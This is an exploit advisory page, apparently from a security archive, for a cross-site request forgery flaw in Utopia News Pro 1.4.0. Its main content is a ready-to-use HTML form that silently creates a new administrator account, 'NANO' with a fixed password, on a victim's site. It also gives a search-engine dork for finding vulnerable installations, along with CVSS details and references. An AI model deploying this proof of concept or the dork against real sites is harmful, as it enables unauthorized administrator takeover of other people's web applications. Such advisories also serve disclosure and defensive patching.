Utopia News Pro 1.4.0 <= CSRF Add Admin Vulnerability

2012.08.22
Credit: Dr.NaNo
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Utopia News Pro 1.4.0 <= CSRF Add Admin Vulnerability # Date: 7/4/2012 # Author: Dr.NaNo # Software Link: http://www.utopiasoftware.net/newspro/dl.php?filename=newspro140b.zip&mirror=1 # Version: 1.4.0 # Tested on: Linux-Red-Hat # Google Dork: Powered By Utopia News Pro 1.4.0 # ######################################################## # ~ Exploit ~ # ######################################################## <html> <body> <form action="http://localhost/{PATh}/upload/users.php" method="post" /> <input type="hidden" name="username" value="NANO" /> <input type="hidden" name="groupid" value="1" /> <input type="hidden" name="password" value="102030" /> <input type="hidden" name="password2" value="102030" /> <input type="hidden" name="email" value="security@security.com" /> <input type="submit" name="submitnew" accesskey="s" value="ThankS !" /> </form> </body> </html> #### ~ Greetz ~ ######################################################### # # # Dr.WEP , JIKO , ahwak2000 , RENO , ABU NWAF , Dr.HAiL , snc0pe , 020 # # # # JaBrOt HaCkEr , alkaseer20 , SadHaCkEr , Cyber Code , aircrack -ng # # # ############################################### ~ All FriendS ~ #########

References:

http://xforce.iss.net/xforce/xfdb/74760
http://www.exploit-db.com/exploits/18720
http://osvdb.org/80986


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top